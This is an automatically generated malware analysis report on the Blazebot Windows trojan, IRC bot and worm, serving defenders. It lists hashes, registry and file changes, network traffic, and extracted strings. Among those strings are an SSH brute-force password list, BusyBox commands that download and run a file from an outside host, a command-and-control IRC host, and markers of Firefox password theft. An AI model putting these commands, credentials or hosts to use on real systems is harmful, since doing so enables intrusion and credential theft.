Blazebot_a7dd53b4ba
Trojan.Win32.Blazebot.uv (Kaspersky), Gen:Variant.Graftor.140744 (AdAware), GenericMSNWorm.YR, GenericAutorunWorm.YR, GenericIRCBot.YR, GenericProxy.YR, Blazebot.YR (Lavasoft MAS)
Behaviour: Trojan, Worm, WormAutorun, IRCBot, MSNWorm, Trojan-Proxy
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
MD5: a7dd53b4ba87329c91719e2c45b2b426
SHA1: 639bde2db05d12d28faa387974f9e43436300c64
SHA256: 59ede0763198ab755f9d44e007346262dcf87dde8f21e2188cdbe8b80a2d3782
SSDeep: 12288:W7bVSmSXloZPe9ACTTnxFYcD0qLNkW xKdxOWRiirQe1uBFCtkCLUmZC0Jhq6pq:FloJe9ACT/YC0EmW6LiFEIkuZChL
Size: 1119744 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: Windows
Created at: 2014-04-30 19:31:23
Analyzed on: WindowsXP SP3 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Payload
| Behaviour | Description |
|---|---|
| WormAutorun | A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Trojan's file once a user opens a drive's folder in Windows Explorer. |
| IRCBot | A bot can communicate with command and control servers via IRC channel. |
| MSNWorm | A worm can spread its copies through MSN Messenger. |
| Trojan-Proxy | This program can launch a proxy server (SOCKS4) on a designated TCP port. |
Process activity
The Trojan creates the following process(es):
%original file name%.exe:3272
system32.exe:3300
The Trojan injects its code into the following process(es):
system32.exe:3220
File activity
The process %original file name%.exe:3272 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%.exe (7547 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
The process system32.exe:3220 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Cookies\8LQCYG2J.txt (119 bytes)
%Documents and Settings%\%current user%\Cookies\N8VWP5L8.txt (119 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Cookies\8LQCYG2J.txt (0 bytes)
Registry activity
The process %original file name%.exe:3272 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "99 B2 3A EA E6 A5 B0 8E BA 2B 34 8A 21 EA 49 B3"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Windows Data Serivce" = "system32.exe"
The process system32.exe:3220 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BA C1 32 DB 6F AF DE B3 84 D8 9B 2D 20 C3 97 94"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 41 00 00 00 01 00 00 00 00 00 00 00"
The Trojan modifies IE security zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
The Trojan modifies IE security zone settings so that all local web nodes with no dots in their names, which are not assigned to any zone, are mapped to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE security zone settings so that all URLs are mapped to the Intranet Zone:
"IntranetName" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
Dropped PE files
There are no dropped PE files.
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Trojan's file once a user opens a drive's folder in Windows Explorer.
A worm can spread its copies through MSN Messenger.
VersionInfo
No information is available.
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 35396 | 35840 | 4.55836 | 2341c1e6476c6c6ed4cacd63d20cb2f6 |
| .rdata | 40960 | 7540 | 7680 | 3.79913 | 95b704827cbd1a172aade85afe108f99 |
| .data | 49152 | 28892 | 22016 | 5.08547 | d8857c4d91d6ce5eb54a1e0542fce9d3 |
| .rsrc | 81920 | 1053016 | 1053184 | 4.33074 | c01d90f67e6005110cbecad5872beb3c |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
| URL | IP |
|---|---|
| hxxp://www.whatismyip.com/ | |
| hxxp://checkip.dyndns.com/ | |
| hxxp://checkip.dyndns.org/ | |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET CNC Shadowserver Reported CnC Server IP group 11
ET CNC Shadowserver Reported CnC Server IP group 10
ET CHAT IRC authorization message
ET WEB_CLIENT Possible HTTP 403 XSS Attempt (External Source)
ET SCAN Potential SSH Scan OUTBOUND
ET POLICY Internal Host Retrieving External IP via whatismyip.com - Possible Infection
ET POLICY DynDNS CheckIp External IP Address Server Response
Traffic
GET / HTTP/1.1
Host: VVV.whatismyip.com
Cache-Control: no-cache
HTTP/1.1 403 Forbidden
Server: cloudflare-nginx
Date: Thu, 15 May 2014 05:14:20 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d2f815f827b3662adca9e3cc741e6e0791400130860605; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.whatismyip.com; HttpOnly
Vary: Accept-Encoding
CF-RAY: 12acd9f6c6230868-IAD2b3..<html>.<head><title>403 Forbidden</title>
<script type="text/javascript">.//<![CDATA[.try{if (!window.
CloudFlare) {var CloudFlare=[{verbose:0,p:0,byc:0,owlid:"cf",bag2:1,mi
rage2:{profile:false},oracle:0,paths:{cloudflare:"/cdn-cgi/nexp/dok9v=
790cacef83/"},atok:"8d48c2e2001055edbb9e94cf8da95e79",petok:"da3beb867
a8e8a2c528b9b410231214f5da11e04-1400130860-1800",zone:"whatismyip.com"
,rocket:"a",apps:0}];document.write('<script type="text/javascript"
src="//ajax.cloudflare.com/cdn-cgi/nexp/dok9v=97fb4d042e/cloudflare.m
in.js"><' '\/script>');}}catch(e){};.//]]>.</script>
.</head>.<body bgcolor="white">.<center><h1>40
3 Forbidden</h1></center>.<hr><center>nginx/1.
4.7</center>.</body>.</html>..1.....0..1.....0..nt>....
GET / HTTP/1.1
Host: VVV.whatismyip.com
Cache-Control: no-cache
HTTP/1.1 403 Forbidden
Server: cloudflare-nginx
Date: Thu, 15 May 2014 05:14:20 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d1540bf5fa547d44142d2f65dade778411400130860824; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.whatismyip.com; HttpOnly
Vary: Accept-Encoding
CF-RAY: 12acd9f826450868-IAD2b3..<html>.<head><title>403 Forbidden</title>
<script type="text/javascript">.//<![CDATA[.try{if (!window.
CloudFlare) {var CloudFlare=[{verbose:0,p:0,byc:0,owlid:"cf",bag2:1,mi
rage2:{profile:false},oracle:0,paths:{cloudflare:"/cdn-cgi/nexp/dok9v=
790cacef83/"},atok:"8d48c2e2001055edbb9e94cf8da95e79",petok:"da3beb867
a8e8a2c528b9b410231214f5da11e04-1400130860-1800",zone:"whatismyip.com"
,rocket:"a",apps:0}];document.write('<script type="text/javascript"
src="//ajax.cloudflare.com/cdn-cgi/nexp/dok9v=97fb4d042e/cloudflare.m
in.js"><' '\/script>');}}catch(e){};.//]]>.</script>
.</head>.<body bgcolor="white">.<center><h1>40
3 Forbidden</h1></center>.<hr><center>nginx/1.
4.7</center>.</body>.</html>..1.....0..1.....0..
GET / HTTP/1.1
Host: checkip.dyndns.org
Cache-Control: no-cache
GET / HTTP/1.1
Host: checkip.dyndns.org
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: text/html
Server: DynDNS-CheckIP/1.0
Connection: close
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 105<html><head><title>Current IP Check</title><
;/head><body>Current IP Address: "%local server IP%"</body>&l
t;/html>....
GET / HTTP/1.1
Host: checkip.dyndns.org
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: text/html
Server: DynDNS-CheckIP/1.0
Connection: close
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 105<html><head><title>Current IP Check</title><
;/head><body>Current IP Address: "%local server IP%"</body>&l
t;/html>....
GET / HTTP/1.1
Host: VVV.whatismyip.com
Cache-Control: no-cache
HTTP/1.1 403 Forbidden
Server: cloudflare-nginx
Date: Thu, 15 May 2014 05:14:20 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d2f815f827b3662adca9e3cc741e6e0791400130860605; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.whatismyip.com; HttpOnly
Vary: Accept-Encoding
CF-RAY: 12acd9f6c07a0868-IAD2b3..<html>.<head><title>403 Forbidden</title>
<script type="text/javascript">.//<![CDATA[.try{if (!window.
CloudFlare) {var CloudFlare=[{verbose:0,p:0,byc:0,owlid:"cf",bag2:1,mi
rage2:{profile:false},oracle:0,paths:{cloudflare:"/cdn-cgi/nexp/dok9v=
790cacef83/"},atok:"8d48c2e2001055edbb9e94cf8da95e79",petok:"da3beb867
a8e8a2c528b9b410231214f5da11e04-1400130860-1800",zone:"whatismyip.com"
,rocket:"a",apps:0}];document.write('<script type="text/javascript"
src="//ajax.cloudflare.com/cdn-cgi/nexp/dok9v=97fb4d042e/cloudflare.m
in.js"><' '\/script>');}}catch(e){};.//]]>.</script>
.</head>.<body bgcolor="white">.<center><h1>40
3 Forbidden</h1></center>.<hr><center>nginx/1.
4.7</center>.</body>.</html>..1.....0..1.....0..nt>....
GET / HTTP/1.1
Host: VVV.whatismyip.com
Cache-Control: no-cache
HTTP/1.1 403 Forbidden
Server: cloudflare-nginx
Date: Thu, 15 May 2014 05:14:21 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d1540bf5fa547d44142d2f65dade778411400130860824; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.whatismyip.com; HttpOnly
Vary: Accept-Encoding
CF-RAY: 12acd9f820bd0868-IAD2b3..<html>.<head><title>403 Forbidden</title>
<script type="text/javascript">.//<![CDATA[.try{if (!window.
CloudFlare) {var CloudFlare=[{verbose:0,p:0,byc:0,owlid:"cf",bag2:1,mi
rage2:{profile:false},oracle:0,paths:{cloudflare:"/cdn-cgi/nexp/dok9v=
790cacef83/"},atok:"8d48c2e2001055edbb9e94cf8da95e79",petok:"ede762f2d
3eb053293842f464fa09c1e9b0be355-1400130861-1800",zone:"whatismyip.com"
,rocket:"a",apps:0}];document.write('<script type="text/javascript"
src="//ajax.cloudflare.com/cdn-cgi/nexp/dok9v=97fb4d042e/cloudflare.m
in.js"><' '\/script>');}}catch(e){};.//]]>.</script>
.</head>.<body bgcolor="white">.<center><h1>40
3 Forbidden</h1></center>.<hr><center>nginx/1.
4.7</center>.</body>.</html>..1.....0..1.....0..
The Trojan connects to the servers at the following location(s):
msn.msg
msn.stop
login
firefox
join
reptile.exe
sshspreadscan
sshgodscan
sshadminscan
ntpass
Exploit FTPD: %d, Total: %d.
%s: %d,
%s Exploit Statistics:
%s.%s.%s.%s
%s Scan not active.
%s Current IP: %s.
%s Server started, Port: %i, File: %s.
%d.%d.%d.%d
%s Finished at %s:%d after %d minute(s) of scanning.
%s %s:%d, Scan thread: %d, Sub-thread: %d.
%s Failed to initialize critical section, error: <%d>
%s Portscan: %s:%d open.
Failed auth by %s(%s@%s)
Whats up %s? Im ready to rock!
Spy: %s!%s@%s (PM: "%s")
Fail by: %s!%s@%s (Pass Tried: %s)
%s out.
%s already running: <%d>.
Failed to start thread %s, error: <%d>.
[Current task] %s [System uptime] %s [Bot Uptime] %s
Bot installed on: %s.
Go fuck yourself %s.
MSN// Message & Zipfile sent to: %d contacts.
I tried to fool %d morons.
MSN// Sent Stats - Messages: %d :: Files: %d :: Message & Files: %d.
Removed by: %s!%s@%s
Advapi.dll Failed
PStore.dll Failed.
%s Failed to parse command.
%s Failed to start scan thread, error: <%d>.
%s %s Port Scan started on %s:%d with a delay of %d seconds for %d minutes using %d threads.
%s No subnet class specified, try "-a" or "-b" or "-c"
%s Could not parse external IP.
%s Trying to get external IP.
%s Failed to start scan, no IP specified.
%d.x.x.x
%s Failed to start scan, port is invalid.
%s Already scanning with %d threads. Too many specified.
Updating from %s (%s)
%stempfile%d%d%d%d%d.exe
Downloading %s and saving it to: %s.
Failed to start socks4 daemon (%s)
Socks(4) server started on %s:%i
Starting firefox pstore
FIREFOX Threads
Process Finished: "%s", Total Running Time: %s.
File executed: %s
Unable to create process: "%s"
%s Couldn't parse path, error: <%d>
%.1fkb downloaded to %s (%.1fkbps)
Couldn't open file for writing: %s.
PK11_CheckUserPassword
PK11_GetInternalKeySlot
softokn3.dll
sqlite3.dll
nssutil3.dll
plds4.dll
nspr4.dll
mozcrt19.dll
nss3.dll
plc4.dll
%s %s:%s
SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command
\profiles.ini
Application Data\Mozilla\Firefox
signons3.txt
signons2.txt
signons1.txt
%s File transfer complete to IP: %s.
%s File transfer complete to IP: %s, File: %s, Size: %s bytes, Total sends: %i.
%s Started send to IP: %s.
200 PORT command successful.
PORT
%s %s LIST request from: %s
425 Passive not supported on this server
215 StnyFtpd
331 Password required
%s %s
%s Couldn't open data connection to: %s:%i, error: <%d>.
Ping Timeout? (%d-%d)%d/%d
Login list completed!
<%i> %s!%s@%s
Logins:
USER blaze * 0 :%s
NICK %s
{%s-%s-%s-%s-%s}{iNF-%s-%s-%s-%s-%s}nigzss.txt
TskMultiChatForm.UnicodeClass
__oxFrame.class__
PASS %s
QUIT %s
PONG %s
NICK
PRIVMSG
JOIN
NOTICE %s :%s
PRIVMSG %s :%s
JOIN %s
JOIN %s %s
PART %s
[%s|%s]
Mozilla/4.0 (compatible)
%s!%s@%s
NICK {%s-%s-%s-%s-%s}https:/
http:/
system32.exe
Windows Data Serivce
#sshscan2
EFTP//
ftpd.exe
underirc.sytes.net.
#sshchannel2
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
%s\%s
No %s thread found.
%s thread stopped.
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}\Desktop.ini
\autorun.inf
icon=%SystemRoot%\system32\SHELL32.dll,4
http://www.whatismyip.com
http://checkip.dyndns.org
del "%s">nul
if exist "%s" goto Repeat
ping 0.0.0.0>nul
%s\removeMe%i%i%i%i.bat
%s%%s
%d day%s (%0.2d hours & %0.2d mins)
passwd
01010101
10101010
rootwebmaster
rootwebadmin
ftpuserftpuser
mysqlmysql
pgsqlpgsql
webweb
webmasterwebmaster
ftpserver
webserver
ftpftp
webadmin
webadmin1
webmaster
0987654321
1234567890
monkey1
PaSsWoRd
69696969
mypass
12341234
7654321
87654321
monkey
password1
newpass
systempass
%s %s: SSH USELESS: root@%s %s .
%s %s: SSH WIN: root@%s %s .
password
%s %s: SSH LOL: root:%s@%s .
BusyBox Instructed: %s.
./1.jpg
chmod x 1.jpg
test ! -e 1.jpg && busybox wget http://www.e-qacs.com/1.jpg
wget http://www.e-qacs.com/1.jpg
BusyBox Fail@ShellOpen: %s.
BusyBox Fail@PtyOpen: %s.
BusyBox Fail@ChannelOpen: %s.
%System%.exe
192.168.1.120
SC// Random Port Scan started on 108.x.x.x:22 with a delay of 10 seconds for 0 minutes using 60 threads.
EFTP// Server started, Port: 16759, File: %System%.exe.
"%local server IP%"
system32.exe_3220_rwx_00400000_000F6000:
.text
`.rdata
@.data
.rsrc
PSSh]
t1SSSSh
SSShx
PSSh*t@
3|$43|$$
3|$<3|$$
3|$(3|$,
.EOWSU
msn.msg
msn.stop
login
firefox
join
Big Number part of OpenSSL 0.9.8j 07 Jan 2009
SHA1 part of OpenSSL 0.9.8j 07 Jan 2009
MD5 part of OpenSSL 0.9.8j 07 Jan 2009
RSA part of OpenSSL 0.9.8j 07 Jan 2009
DSA part of OpenSSL 0.9.8j 07 Jan 2009
len>=0 && len<=(int)sizeof(ctx->key)
j <= (int)sizeof(ctx->key)
EVP part of OpenSSL 0.9.8j 07 Jan 2009
CERTIFICATE REQUEST
NEW CERTIFICATE REQUEST
CERTIFICATE
RSA PRIVATE KEY
DSA PRIVATE KEY
EC PRIVATE KEY
RAND part of OpenSSL 0.9.8j 07 Jan 2009
You need to read the OpenSSL FAQ, http://www.openssl.org/support/faq.html
%s(%d): OpenSSL internal error, assertion failed: %s
Diffie-Hellman part of OpenSSL 0.9.8j 07 Jan 2009
SHA-256 part of OpenSSL 0.9.8j 07 Jan 2009
SHA-512 part of OpenSSL 0.9.8j 07 Jan 2009
DlRIPE-MD160 part of OpenSSL 0.9.8j 07 Jan 2009
CAST part of OpenSSL 0.9.8j 07 Jan 2009
RC4 part of OpenSSL 0.9.8j 07 Jan 2009
Blowfish part of OpenSSL 0.9.8j 07 Jan 2009
Microsoft Local Key set
LocalKeySet
id-Gost28147-89-None-KeyMeshing
id-Gost28147-89-CryptoPro-KeyMeshing
password based MAC
id-PasswordBasedMAC
X509v3 Certificate Issuer
certificateIssuer
certicom-arc
Proxy Certificate Information
proxyCertInfo
Microsoft Smartcardlogin
msSmartcardLogin
joint-iso-itu-t
JOINT-ISO-ITU-T
set-rootKeyThumb
setAttr-Cert
setCext-cCertRequired
setCext-certType
setct-CertResTBE
setct-CertReqTBEX
setct-CertReqTBE
setct-AcqCardCodeMsgTBE
setct-CertInqReqTBS
setct-CertResData
setct-CertReqTBS
setct-CertReqData
setct-PCertResTBS
setct-PCertReqData
setct-AcqCardCodeMsg
certificate extensions
set-certExt
set-msgExt
id-ecPublicKey
id-cmc-confirmCertAcceptance
id-cmc-getCert
id-regInfo-certReq
id-regCtrl-protocolEncrKey
id-regCtrl-oldCertID
id-it-revPassphrase
id-it-keyPairParamRep
id-it-keyPairParamReq
id-it-unsupportedOIDs
id-it-caKeyUpdateInfo
id-it-encKeyPairTypes
id-it-signKeyPairTypes
id-it-caProtEncCert
id-mod-attribute-cert
id-mod-qualified-cert-93
id-mod-qualified-cert-88
id-smime-aa-ets-certCRLTimestamp
id-smime-aa-ets-certValues
id-smime-aa-ets-CertificateRefs
id-smime-aa-ets-otherSigCert
id-smime-aa-smimeEncryptCerts
id-smime-aa-signingCertificate
id-smime-aa-encrypKeyPref
id-smime-aa-msgSigDigest
id-smime-ct-publishCert
id-smime-mod-msg-v3
sdsiCertificate
x509Certificate
localKeyID
certBag
pkcs8ShroudedKeyBag
keyBag
pbeWithSHA1And2-KeyTripleDES-CBC
pbeWithSHA1And3-KeyTripleDES-CBC
TLS Web Client Authentication
TLS Web Server Authentication
X509v3 Extended Key Usage
extendedKeyUsage
X509v3 Authority Key Identifier
authorityKeyIdentifier
X509v3 Certificate Policies
certificatePolicies
X509v3 Private Key Usage Period
privateKeyUsagePeriod
X509v3 Key Usage
keyUsage
X509v3 Subject Key Identifier
subjectKeyIdentifier
Netscape Certificate Sequence
nsCertSequence
Netscape CA Policy Url
nsCaPolicyUrl
Netscape Renewal Url
nsRenewalUrl
Netscape CA Revocation Url
nsCaRevocationUrl
Netscape Revocation Url
nsRevocationUrl
Netscape Base Url
nsBaseUrl
Netscape Cert Type
nsCertType
Netscape Certificate Extension
nsCertExt
extendedCertificateAttributes
challengePassword
dhKeyAgreement
pubkey
PEM part of OpenSSL 0.9.8j 07 Jan 2009
phrase is too short, needs to be at least %d chars
Enter PEM pass phrase:
TRUSTED CERTIFICATE
X509 CERTIFICATE
PRIVATE KEY
ANY PRIVATE KEY
ENCRYPTED PRIVATE KEY
enc_key
key_enc_algor
cert
d.encrypted
d.digest
d.signed_and_enveloped
d.enveloped
d.sign
d.data
d.other
NETSCAPE_CERT_SEQUENCE
certs
.\crypto\pem\pem_pkey.c
X509_PUBKEY
public_key
priv_key
pub_key
.\crypto\ec\ec_key.c
EC_PRIVATEKEY
publicKey
privateKey
value.implicitlyCA
value.parameters
value.named_curve
p.char_two
p.prime
p.ppBasis
p.tpBasis
p.onBasis
p.other
EVP_CIPHER_key_length(cipher) <= (int)sizeof(md_tmp)
USER32.DLL
NETAPI32.DLL
KERNEL32.DLL
ADVAPI32.DLL
lhash part of OpenSSL 0.9.8j 07 Jan 2009
Stack part of OpenSSL 0.9.8j 07 Jan 2009
.\crypto\dh\dh_key.c
ASN.1 part of OpenSSL 0.9.8j 07 Jan 2009
value.single
value.set
.\crypto\evp\evp_key.c
nkey <= EVP_MAX_KEY_LENGTH
cert_info
EC part of OpenSSL 0.9.8j 07 Jan 2009
ECDSA part of OpenSSL 0.9.8j 07 Jan 2009
PKCS8_PRIV_KEY_INFO
pkey
pkeyalg
.\crypto\evp\evp_pkey.c
keylen <= sizeof key
.\crypto\pkcs12\p12_key.c
RC2 part of OpenSSL 0.9.8j 07 Jan 2009
IDEA part of OpenSSL 0.9.8j 07 Jan 2009
AUTHORITY_KEYID
keyid
X509_CERT_PAIR
X509_CERT_AUX
keylength
keyfunc
MD2 part of OpenSSL 0.9.8j 07 Jan 2009
%'%1%=%C%K%O%s%
.%.-.3.7.9.?.W.[.o.y.
C%C'C3C7C9COCWCiC
Verifying - %s
%lu:%s:%s:%d:%s
error:lX:%s:%s:%s
d.usernotice
d.cpsuri
CERTIFICATEPOLICIES
%*sCPS: %s
%*sExplicit Text: %s
%*sNumber%s:
%*sOrganization: %s
d.registeredID
d.iPAddress
d.uniformResourceIdentifier
d.ediPartyName
d.directoryName
d.dNSName
d.rfc822Name
d.otherName
value.bag
value.safes
value.shkeybag
value.keybag
value.sdsicert
value.x509cert
value.other
'()+,-./:=?
CONF part of OpenSSL 0.9.8j 07 Jan 2009
%d.%d.%d.%d/%d.%d.%d.%d
%*s%s:
%*sPolicy Text: %s
%*scrlUrl:
EXTENDED_KEY_USAGE
%*sZone: %s, User:
certificateHold
Certificate Hold
cessationOfOperation
Cessation Of Operation
keyCompromise
Key Compromise
name.relativename
name.fullname
.\crypto\x509v3\v3_akey.c
IP Address:%d.%d.%d.%d
URI:%s
DNS:%s
email:%s
EdiPartyName:
X400Name:
othername:
PKEY_USAGE_PERIOD
keyCertSign
Certificate Sign
keyAgreement
Key Agreement
keyEncipherment
Key Encipherment
.\crypto\x509v3\v3_skey.c
CONF_def part of OpenSSL 0.9.8j 07 Jan 2009
[[%s]]
[%s] %s=%s
PROXY_CERT_INFO_EXTENSION
crlUrl
certStatus
certId
OCSP_CERTSTATUS
value.unknown
value.revoked
value.good
value.byKey
value.byName
reqCert
OCSP_CERTID
issuerKeyHash
%s - d:d:d %d%s
\X
- %-15s
%s.dll
deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly
1.2.3
inflate 1.2.3 Copyright 1995-2005 Mark Adler
__MSVCRT_HEAP_SELECT
GetWindowsDirectoryA
VkKeyScanA
keybd_event
USER32.dll
RegCloseKey
RegOpenKeyExA
RegCreateKeyExA
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
USERENV.dll
WS2_32.dll
GetCPInfo
GetProcessWindowStation
DI32.dll
ReportEventA
reptile.exe
libssh2_banner_set
libssh2_base64_decode
libssh2_channel_close
libssh2_channel_direct_tcpip_ex
libssh2_channel_eof
libssh2_channel_flush_ex
libssh2_channel_forward_accept
libssh2_channel_forward_cancel
libssh2_channel_forward_listen_ex
libssh2_channel_free
libssh2_channel_get_exit_status
libssh2_channel_handle_extended_data
libssh2_channel_handle_extended_data2
libssh2_channel_open_ex
libssh2_channel_process_startup
libssh2_channel_read_ex
libssh2_channel_receive_window_adjust
libssh2_channel_request_pty_ex
libssh2_channel_request_pty_size_ex
libssh2_channel_send_eof
libssh2_channel_set_blocking
libssh2_channel_setenv_ex
libssh2_channel_wait_closed
libssh2_channel_wait_eof
libssh2_channel_window_read_ex
libssh2_channel_window_write_ex
libssh2_channel_write_ex
libssh2_channel_x11_req_ex
libssh2_hostkey_hash
libssh2_poll
libssh2_poll_channel_read
libssh2_session_abstract
libssh2_session_block_directions
libssh2_session_callback_set
libssh2_session_disconnect_ex
libssh2_session_flag
libssh2_session_free
libssh2_session_get_blocking
libssh2_session_init_ex
libssh2_session_last_errno
libssh2_session_last_error
libssh2_session_method_pref
libssh2_session_methods
libssh2_session_set_blocking
libssh2_session_startup
libssh2_trace
libssh2_userauth_authenticated
libssh2_userauth_hostbased_fromfile_ex
libssh2_userauth_keyboard_interactive_ex
libssh2_userauth_list
libssh2_userauth_password_ex
libssh2_userauth_publickey_fromfile_ex
sshspreadscan
sshgodscan
sshadminscan
ntpass
Exploit FTPD: %d, Total: %d.
%s: %d,
%s Exploit Statistics:
%s.%s.%s.%s
%s Scan not active.
%s Current IP: %s.
%s Server started, Port: %i, File: %s.
%d.%d.%d.%d
%s Finished at %s:%d after %d minute(s) of scanning.
%s %s:%d, Scan thread: %d, Sub-thread: %d.
%s Failed to initialize critical section, error: <%d>
%s Portscan: %s:%d open.
Failed auth by %s(%s@%s)
Whats up %s? Im ready to rock!
Spy: %s!%s@%s (PM: "%s")
Fail by: %s!%s@%s (Pass Tried: %s)
%s out.
%s already running: <%d>.
Failed to start thread %s, error: <%d>.
[Current task] %s [System uptime] %s [Bot Uptime] %s
Bot installed on: %s.
Go fuck yourself %s.
MSN// Message & Zipfile sent to: %d contacts.
I tried to fool %d morons.
MSN// Sent Stats - Messages: %d :: Files: %d :: Message & Files: %d.
Removed by: %s!%s@%s
Advapi.dll Failed
PStore.dll Failed.
%s Failed to parse command.
%s Failed to start scan thread, error: <%d>.
%s %s Port Scan started on %s:%d with a delay of %d seconds for %d minutes using %d threads.
%s No subnet class specified, try "-a" or "-b" or "-c"
%s Could not parse external IP.
%s Trying to get external IP.
%s Failed to start scan, no IP specified.
%d.x.x.x
%s Failed to start scan, port is invalid.
%s Already scanning with %d threads. Too many specified.
Updating from %s (%s)
%stempfile%d%d%d%d%d.exe
Downloading %s and saving it to: %s.
Failed to start socks4 daemon (%s)
Socks(4) server started on %s:%i
Starting firefox pstore
FIREFOX Threads
Process Finished: "%s", Total Running Time: %s.
File executed: %s
Unable to create process: "%s"
%s Couldn't parse path, error: <%d>
%.1fkb downloaded to %s (%.1fkbps)
Couldn't open file for writing: %s.
PK11_CheckUserPassword
PK11_GetInternalKeySlot
softokn3.dll
sqlite3.dll
nssutil3.dll
plds4.dll
nspr4.dll
mozcrt19.dll
nss3.dll
plc4.dll
%s %s:%s
SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command
\profiles.ini
Application Data\Mozilla\Firefox
signons3.txt
signons2.txt
signons1.txt
%s File transfer complete to IP: %s.
%s File transfer complete to IP: %s, File: %s, Size: %s bytes, Total sends: %i.
%s Started send to IP: %s.
200 PORT command successful.
PORT
%s %s LIST request from: %s
425 Passive not supported on this server
215 StnyFtpd
331 Password required
%s %s
%s Couldn't open data connection to: %s:%i, error: <%d>.
Ping Timeout? (%d-%d)%d/%d
Login list completed!
<%i> %s!%s@%s
Logins:
USER blaze * 0 :%s
NICK %s
{%s-%s-%s-%s-%s}
{iNF-%s-%s-%s-%s-%s}
nigzss.txt
TskMultiChatForm.UnicodeClass
__oxFrame.class__
PASS %s
QUIT %s
PONG %s
NICK
PRIVMSG
JOIN
NOTICE %s :%s
PRIVMSG %s :%s
JOIN %s
JOIN %s %s
PART %s
[%s|%s]
shlwapi.dll
pstorec.dll
psapi.dll
userenv.dll
SQLDisconnect
SQLFreeHandle
SQLAllocHandle
SQLExecDirect
SQLSetEnvAttr
SQLDriverConnect
odbc32.dll
ShellExecuteA
shell32.dll
mpr.dll
GetUdpTable
GetTcpTable
iphlpapi.dll
dnsapi.dll
netapi32.dll
Mozilla/4.0 (compatible)
InternetCrackUrlA
InternetOpenUrlA
FtpPutFileA
FtpGetFileA
HttpSendRequestA
HttpOpenRequestA
wininet.dll
ws2_32.dll
RegEnumKeyExA
advapi32.dll
user32.dll
kernel32.dll
%s!%s@%s
NICK {%s-%s-%s-%s-%s}
https:/
http:/
system32.exe
Windows Data Serivce
#sshscan2
EFTP//
ftpd.exe
underirc.sytes.net.
#sshchannel2
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
%s\%s
No %s thread found.
%s thread stopped.
[.ShellClassInfo]
